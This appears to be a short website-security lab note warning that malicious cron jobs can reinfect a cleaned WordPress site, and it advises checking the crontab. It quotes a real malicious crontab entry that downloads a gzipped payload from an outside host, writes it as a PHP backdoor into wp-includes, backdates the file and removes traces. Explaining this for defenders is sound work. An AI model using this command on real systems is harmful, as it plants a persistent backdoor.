Malicious Cron Jobs

Labs Note

You may remove malware from files and a database, close all security holes, change all passwords, but your site still gets reinfected regularly. It may be because you forgot to clean your crontab.

Here’s an example of a malicious cron job that creates a backdoor file in the /wp-includes/Text/Diff/Engine directory every other day:

DOWNLOAD_URL="hxxp://cpanel .jawebsolutions .com/u/w.gz"LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 $LOCAL_FILE_PATH && rm -f /var/tmp/w.gz

So don’t forget to check cron jobs in your hosting control panel or use the crontab -l command if you have SSH access.

You May Also Like